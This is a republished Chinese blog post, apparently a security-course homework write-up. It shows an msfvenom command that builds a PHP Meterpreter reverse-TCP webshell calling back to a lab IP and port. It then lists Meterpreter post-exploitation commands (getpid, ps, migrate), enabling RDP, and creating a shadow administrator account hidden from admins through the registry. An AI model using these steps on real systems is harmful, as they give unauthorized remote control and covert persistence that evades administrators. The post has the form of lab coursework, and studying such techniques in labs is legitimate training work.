您的位置:首页 > 房产 > 建筑 > 阿一网络安全课后作业之msfvemon生成php的webshell,用msf的handler连接

阿一网络安全课后作业之msfvemon生成php的webshell,用msf的handler连接

2024/10/6 5:57:13 来源:https://blog.csdn.net/Ayixy/article/details/140767238  浏览:    关键词:阿一网络安全课后作业之msfvemon生成php的webshell,用msf的handler连接

先用msf生成php的webshell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=4396 -f raw -o test.php

开启handler监听

然后就成功了

后渗透中权限维持影子账户创建

Msf生成个exe文件然后反向连接

然后权限维持

getpid    # 获取当前进程的pid

ps     # 查看当前活跃进程

migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中

然后开启3389远程连接直接远程登录

我们直接远程连接在本地直接创建影子账户

我们同样可以将这些账户进行隐藏,从而让管理员无法发现,达到影子账号的效果:
通过注册表的修改

然后就进去了

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com